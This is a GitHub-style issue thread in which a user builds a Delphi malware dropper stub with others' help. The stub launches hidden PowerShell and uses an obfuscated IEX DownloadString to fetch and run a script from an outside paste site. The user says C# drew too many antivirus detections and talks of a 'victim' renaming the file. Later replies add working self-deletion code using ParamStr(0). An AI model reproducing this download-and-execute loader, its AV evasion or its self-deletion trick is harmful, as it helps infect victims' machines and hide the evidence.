Self Destruct Feature

Question

Self Destruct Feature

msfcon5ol3 opened this issue 2 years ago · 9 comments

This code snipped below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution. Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.

Answer 1 · 2023-01-20T02:00:53.000Z

In the powershell command add a delay and then a command to remove the file (itself).

Answer 2 · 2023-01-20T02:29:36.000Z

In the powershell command add a delay and then a command to remove the file (itself).

This worked but if there's a case in which the file is renamed by victim , this makes this command useless.
What could I do here instead of using the file name as the method of deletion ?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

Answer 3 · 2023-01-20T02:32:33.000Z

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Answer 4 · 2023-01-20T02:40:31.000Z

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Could you edit the code for me please I'm noob in Delphi ?

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Answer 5 · 2023-01-20T03:11:45.000Z

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

Answer 6 · 2023-01-20T03:21:11.000Z

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

Thanks but compilation error, I'm still trying to fix it....

Answer 7 · 2023-01-20T10:46:57.000Z

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Answer 8 · 2023-01-20T12:26:29.000Z

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Thanks finally it worked like charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release but you may have to add some delphi / pascal compiler to your repository and the other options such as start delay , fake error, run as admin etc.

Answer 9 · 2023-01-20T15:00:56.000Z

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.